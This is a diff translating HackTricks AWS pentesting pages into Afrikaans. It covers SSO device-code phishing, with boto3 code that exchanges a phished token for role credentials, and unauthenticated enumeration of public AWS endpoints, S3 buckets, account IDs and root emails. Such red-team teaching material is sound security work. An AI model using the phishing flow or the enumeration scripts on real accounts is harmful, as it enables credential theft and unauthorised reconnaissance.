+clientId=client_id,
+clientSecret=client_secret,
+grantType="urn:ietf:params:oauth:grant-type:device_code",
+deviceCode=deviceCode
 )
 sso_token = token_response.get('accessToken')
 ```
+Die SSO toegangstoken is **geldigheid vir 8h**.
 
-The SSO access token is **valid for 8h**.
-
-5. **Impersonate the user**
-
+5. **Verpersoonlik die gebruiker**
 ```python
 sso_client = boto3.client('sso', region_name=REGION)
 
 # List accounts where the user has access
 aws_accounts_response = sso_client.list_accounts(
-        accessToken=sso_token,
-        maxResults=100
+accessToken=sso_token,
+maxResults=100
 )
 aws_accounts_response.get('accountList', [])
 
 # Get roles inside an account
 roles_response = sso_client.list_account_roles(
-        accessToken=sso_token,
-        accountId=<account_id>
+accessToken=sso_token,
+accountId=<account_id>
 )
 roles_response.get('roleList', [])
 
 # Get credentials over a role
 
 sts_creds = sso_client.get_role_credentials(
-        accessToken=sso_token,
-        roleName=<role_name>,
-        accountId=<account_id>
+accessToken=sso_token,
+roleName=<role_name>,
+accountId=<account_id>
 )
 sts_creds.get('roleCredentials')
 ```
+### Phishing die onphishbare MFA
 
-### Phishing the unphisable MFA
+Dit is lekker om te weet dat die vorige aanval **werk selfs as 'n "onphishbare MFA" (webAuth) gebruik word**. Dit is omdat die vorige **werkstroom nooit die gebruikte OAuth-domein verlaat nie**. Nie soos in ander phishing-aanvalle waar die gebruiker die aanmeld-domein moet vervang nie, in die geval is die toestelkode werkstroom voorberei sodat 'n **kode bekend is aan 'n toestel** en die gebruiker kan aanmeld selfs op 'n ander masjien. As die prompt aanvaar word, kan die toestel, net deur **die aanvanklike kode te ken**, **akkrediteer** vir die gebruiker.
 
-It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user.
+Vir meer inligting oor hierdie [**kyk hierdie pos**](https://mjg59.dreamwidth.org/62175.html).
 
-For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html).
-
-### Automatic Tools
+### Outomatiese Gereedskap
 
 - [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication)
 - [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish)
 
-## References
+## Verwysings
 
 - [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/)
 - [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing)
@@ -129,7 +121,3 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217
 - [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
index 38622c338..778c09277 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
@@ -2,16 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 mqtt://{random_id}.iot.{region}.amazonaws.com:8883
 https://{random_id}.iot.{region}.amazonaws.com:8443
 https://{random_id}.iot.{region}.amazonaws.com:443
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
index 58b8a1309..c334f718b 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://{random_id}.kinesisvideo.{region}.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
index 5109a2044..e3b566b17 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
@@ -2,25 +2,19 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Public Function URL
+## Publieke Funksie URL
 
-It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities.
-
-### Public URL template
+Dit is moontlik om 'n **Lambda** te verbind met 'n **publieke funksie URL** wat enige iemand kan toegang. Dit kan web kwesbaarhede bevat.
 
+### Publieke URL sjabloon
 ```
 https://{random_id}.lambda-url.{region}.on.aws/
 ```
+### Kry rekening ID van openbare Lambda URL
 
-### Get Account ID from public Lambda URL
+Net soos met S3-buckets, Data Exchange en API-gateways, is dit moontlik om die rekening ID van 'n rekening te vind wat die **`aws:ResourceAccount`** **Beleidstoestand Sleutel** van 'n openbare lambda URL misbruik. Dit word gedoen deur die rekening ID een karakter op 'n slag te vind deur gebruik te maak van wildcard in die **`aws:ResourceAccount`** afdeling van die beleid.\
+Hierdie tegniek laat ook toe om **waardes van etikette** te kry as jy die etiket sleutel ken (daar is 'n paar standaard interessante).
 
-Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
index 2bbc4fdd6..f641e88cd 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
@@ -2,16 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://{random_id}.mediaconvert.{region}.amazonaws.com
 https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
 https://{random_id}.data.mediastore.{region}.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
index ab06211e2..24c2e92de 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
@@ -2,25 +2,19 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Public Port
+## Publieke Poort
 
 ### **RabbitMQ**
 
-In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-<uuid>.mq.us-east-1.amazonaws.com/`
+In die geval van **RabbitMQ** is **publieke toegang** en ssl standaard geaktiveer. Maar jy het **akkrediteer** nodig om toegang te verkry (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Boonop is dit moontlik om die **webbestuurskonsol** te benader as jy die akkrediteer weet in `https://b-<uuid>.mq.us-east-1.amazonaws.com/`
 
 ### ActiveMQ
 
-In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access.
-
-### Public URL template
+In die geval van **ActiveMQ** is publieke toegang en ssl standaard geaktiveer, maar jy het akkrediteer nodig om toegang te verkry.
 
+### Publieke URL-sjabloon
 ```
 https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
 ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
index 9bbbd408d..f06943858 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
@@ -2,21 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public Port
+### Publieke Poort
 
-It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured).
+Dit is moontlik om die **Kafka broker aan die publiek bloot te stel**, maar jy sal **akkrediteer** nodig hê, IAM-toestemmings of 'n geldige sertifikaat (afhangende van die geconfigureerde outentikasie metode).
 
-It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet.
-
-### Public URL template
+Dit is ook **moontlik om outentikasie te deaktiveer**, maar in daardie geval is dit **nie moontlik om die poort direk aan die Internet bloot te stel** nie.
 
+### Publieke URL-sjabloon
 ```
 b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
 {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
index 218300e3f..2f99337df 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
@@ -1,23 +1,22 @@
-# AWS - RDS Unauthenticated Enum
+# AWS - RDS Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## RDS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
 {{#endref}}
 
-## Public Port
+## Publieke Poort
 
-It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database.
+Dit is moontlik om publieke toegang tot die **databasis vanaf die internet** te gee. Die aanvaller sal steeds moet **weet wat die gebruikersnaam en wagwoord is,** IAM-toegang, of 'n **exploit** om in die databasis in te kom.
 
-## Public RDS Snapshots
-
-AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account:
+## Publieke RDS-snapshots
 
+AWS laat toe om **toegang aan enigiemand te gee om RDS-snapshots af te laai**. Jy kan hierdie publieke RDS-snapshots baie maklik vanaf jou eie rekening lys:
 ```bash
 # Public RDS snapshots
 aws rds describe-db-snapshots --include-public
@@ -33,16 +32,9 @@ aws rds describe-db-snapshots --snapshot-type public [--region us-west-2]
 ## Even if in the console appear as there are public snapshot it might be public
 ## snapshots from other accounts used by the current account
 ```
-
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
 postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
index ab1577a1e..dad1f81d7 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 {user_provided}.<random>.<region>.redshift.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
index 28c7b1673..928750488 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
@@ -1,43 +1,43 @@
-# AWS - S3 Unauthenticated Enum
+# AWS - S3 Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## S3 Public Buckets
+## S3 Publieke Emmers
 
-A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**.
+'n Emmer word beskou as **“publiek”** as **enige gebruiker die inhoud** van die emmer kan lys, en **“privaat”** as die emmer se inhoud **slegs deur sekere gebruikers gelys of geskryf kan word**.
 
-Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs).
+Maatskappye mag **emmer toestemmings verkeerd geconfigureer** hê wat toegang gee tot alles of tot almal wat in AWS geverifieer is in enige rekening (dus vir enige iemand). Let daarop dat selfs met sulke misconfigurasies sommige aksies dalk nie uitgevoer kan word nie, aangesien emmers hul eie toegangbeheerlyste (ACLs) mag hê.
 
-**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud)
+**Leer meer oor AWS-S3 misconfigurasie hier:** [**http://flaws.cloud**](http://flaws.cloud/) **en** [**http://flaws2.cloud/**](http://flaws2.cloud)
 
-### Finding AWS Buckets
+### Vind AWS Emmers
 
-Different methods to find when a webpage is using AWS to storage some resources:
+Verskillende metodes om te vind wanneer 'n webblad AWS gebruik om sommige hulpbronne te stoor:
 
-#### Enumeration & OSINT:
+#### Enumerasie & OSINT:
 
-- Using **wappalyzer** browser plugin
-- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History.
-- **Check for resources** in domains like:
+- Gebruik **wappalyzer** blaaiertoevoeging
+- Gebruik burp (**spidering** die web) of deur handmatig deur die bladsy te navigeer, sal alle **hulpbronne** **gelaai** in die Geskiedenis gestoor word.
+- **Kyk vir hulpbronne** in domeine soos:
 
-  ```
-  http://s3.amazonaws.com/[bucket_name]/
-  http://[bucket_name].s3.amazonaws.com/
-  ```
+```
+http://s3.amazonaws.com/[bucket_name]/
+http://[bucket_name].s3.amazonaws.com/
+```
 
-- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com`
-- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**.
-- The **bucket name** and the **bucket domain name** needs to be **the same.**
-  - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`.
-  - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/).
+- Kyk vir **CNAMES** soos `resources.domain.com` mag die CNAME `bucket.s3.amazonaws.com` hê
+- Kyk [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), 'n web met reeds **ontdekke oop emmers**.
+- Die **emmer naam** en die **emmer domeinnaam** moet **diezelfde wees.**
+- **flaws.cloud** is in **IP** 52.92.181.107 en as jy daarheen gaan, lei dit jou na [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Ook, `dig -x 52.92.181.107` gee `s3-website-us-west-2.amazonaws.com`.
+- Om te kyk of dit 'n emmer is, kan jy ook **besoek** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/).
 
 #### Brute-Force
 
-You can find buckets by **brute-forcing name**s related to the company you are pentesting:
+Jy kan emmers vind deur **brute-forcing name** wat verband hou met die maatskappy wat jy pentest:
 
 - [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)
 - [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector)
-- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names)
+- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Bevat 'n lys met potensiële emmer name)
 - [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets)
 - [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky)
 - [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers)
@@ -45,48 +45,47 @@ You can find buckets by **brute-forcing name**s related to the company you are p
 - [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner)
 - [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter)
 
-<pre class="language-bash"><code class="lang-bash"># Generate a wordlist to create permutations
+<pre class="language-bash"><code class="lang-bash"># Genereer 'n woordlys om permutasies te skep
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
 curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
 cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
 
-# Generate a wordlist based on the domains and subdomains to test
-## Write those domains and subdomains in subdomains.txt
+# Genereer 'n woordlys gebaseer op die domeine en subdomeine om te toets
+## Skryf daardie domeine en subdomeine in subdomains.txt
 cat subdomains.txt > /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
 
-# Create permutations based in a list with the domains and subdomains to attack
+# Skep permutasies gebaseer op 'n lys met die domeine en subdomeine om aan te val
 goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
-## The previous tool is specialized increating permutations for subdomains, lets filter that list
-<strong>### Remove lines ending with "."
+## Die vorige hulpmiddel is gespesialiseerd in die skep van permutasies vir subdomeine, kom ons filter daardie lys
+<strong>### Verwyder lyne wat eindig met "."
 </strong>cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
-### Create list without TLD
+### Skep lys sonder TLD
 cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
-### Create list without dots
+### Skep lys sonder punte
 cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
-### Create list without hyphens
+### Skep lys sonder koppelteken
 cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
 
-## Generate the final wordlist
+## Genereer die finale woordlys
 cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
 
-## Call s3scanner
+## Roep s3scanner aan
 s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
 </code></pre>
 
-#### Loot S3 Buckets
+#### Loot S3 Emmers
 
-Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**.
+Gegewe S3 oop emmers, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) kan outomaties **soek na interessante inligting**.
 
-### Find the Region
+### Vind die Streek
 
-You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html)
+Jy kan al die ondersteunende streke deur AWS vind in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html)
 
-#### By DNS
-
-You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**:
+#### Deur DNS
 
+Jy kan die streek van 'n emmer kry met 'n **`dig`** en **`nslookup`** deur 'n **DNS versoek van die ontdekte IP** te doen:
 ```bash
 dig flaws.cloud
 ;; ANSWER SECTION:
@@ -96,31 +95,29 @@ nslookup 52.218.192.11
 Non-authoritative answer:
 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
 ```
+Kontroleer dat die opgeloste domein die woord "website" bevat.\
+Jy kan die statiese webwerf bereik deur te gaan na: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\
+of jy kan die emmer bereik deur te besoek: `flaws.cloud.s3-us-west-2.amazonaws.com`
 
-Check that the resolved domain have the word "website".\
-You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\
-or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com`
+#### Deur te Probeer
 
-#### By Trying
-
-If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**:
+As jy probeer om toegang tot 'n emmer te verkry, maar in die **domeinnaam spesifiseer jy 'n ander streek** (byvoorbeeld die emmer is in `bucket.s3.amazonaws.com` maar jy probeer toegang verkry tot `bucket.s3-website-us-west-2.amazonaws.com`, dan sal jy **na die korrekte ligging gewys word**:
 
 ![](<../../../images/image (106).png>)
 
-### Enumerating the bucket
+### Om die emmer te enumereer
 
-To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
+Om die oopheid van die emmer te toets, kan 'n gebruiker net die URL in hul webblaaier invoer. 'n Privaat emmer sal met "Toegang geweier" antwoordgee. 'n Publieke emmer sal die eerste 1,000 voorwerpe wat gestoor is, lys.
 
-Open to everyone:
+Oop vir almal:
 
 ![](<../../../images/image (201).png>)
 
-Private:
+Privaat:
 
 ![](<../../../images/image (83).png>)
 
-You can also check this with the cli:
-
+Jy kan dit ook met die cli kontroleer:
 ```bash
 #Use --no-sign-request for check Everyones permissions
 #Use --profile <PROFILE_NAME> to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
@@ -128,22 +125,18 @@ You can also check this with the cli:
 #Opcionally you can select the region if you now it
 aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
 ```
+As die emmer nie 'n domeinnaam het nie, wanneer jy probeer om dit te enumereer, **sit net die emmernaam** en nie die hele AWSs3-domein nie. Voorbeeld: `s3://<BUCKETNAME>`
 
-If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://<BUCKETNAME>`
-
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://{user_provided}.s3.amazonaws.com
 ```
+### Kry rekening ID van openbare emmer
 
-### Get Account ID from public Bucket
-
-It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\
-And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**.
-
-This tool automates the process:
+Dit is moontlik om 'n AWS-rekening te bepaal deur voordeel te trek uit die nuwe **`S3:ResourceAccount`** **Beleidstoestand Sleutel**. Hierdie toestand **beperk toegang gebaseer op die S3-emmer** waarin 'n rekening is (ander rekening-gebaseerde beleide beperk gebaseer op die rekening waarin die versoekende prinsiep is).\
+En omdat die beleid **wildcards** kan bevat, is dit moontlik om die rekeningnommer **net een nommer op 'n slag** te vind.
 
+Hierdie hulpmiddel outomatiseer die proses:
 ```bash
 # Installation
 pipx install s3-account-search
@@ -153,13 +146,11 @@ s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket
 # With an object
 s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext
 ```
+Hierdie tegniek werk ook met API Gateway-URL's, Lambda-URL's, Data Exchange-data stelle en selfs om die waarde van etikette te verkry (as jy die etiket sleutel ken). Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer.
 
-This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
-
-### Confirming a bucket belongs to an AWS account
-
-As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like:
+### Bevestiging dat 'n emmer aan 'n AWS-rekening behoort
 
+Soos verduidelik in [**hierdie blogpos**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, as jy toestemmings het om 'n emmer te lys** is dit moontlik om 'n accountID te bevestig waaraan die emmer behoort deur 'n versoek soos die volgende te stuur:
 ```bash
 curl -X GET "[bucketname].amazonaws.com/" \
 -H "x-amz-expected-bucket-owner: [correct-account-id]"
@@ -167,41 +158,34 @@ curl -X GET "[bucketname].amazonaws.com/" \
 <?xml version="1.0" encoding="UTF-8"?>
 <ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">...</ListBucketResult>
 ```
-
 If the error is an “Access Denied” it means that the account ID was wrong.
 
 ### Used Emails as root account enumeration
 
-As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account:
-
+Soos verduidelik in [**hierdie blogpos**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), is dit moontlik om te kyk of 'n e-posadres verband hou met enige AWS-rekening deur **te probeer om 'n e-pos toestemming te gee** oor 'n S3-bucket via ACLs. As dit nie 'n fout veroorsaak nie, beteken dit dat die e-pos 'n root-gebruiker van 'n AWS-rekening is:
 ```python
 s3_client.put_bucket_acl(
-    Bucket=bucket_name,
-    AccessControlPolicy={
-        'Grants': [
-            {
-                'Grantee': {
-                    'EmailAddress': 'some@emailtotest.com',
-                    'Type': 'AmazonCustomerByEmail',
-                },
-                'Permission': 'READ'
-            },
-        ],
-        'Owner': {
-            'DisplayName': 'Whatever',
-            'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef'
-        }
-    }
+Bucket=bucket_name,
+AccessControlPolicy={
+'Grants': [
+{
+'Grantee': {
+'EmailAddress': 'some@emailtotest.com',
+'Type': 'AmazonCustomerByEmail',
+},
+'Permission': 'READ'
+},
+],
+'Owner': {
+'DisplayName': 'Whatever',
+'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef'
+}
+}
 )
 ```
-
-## References
+## Verwysings
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
index 7978eff36..fc9ef53c7 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
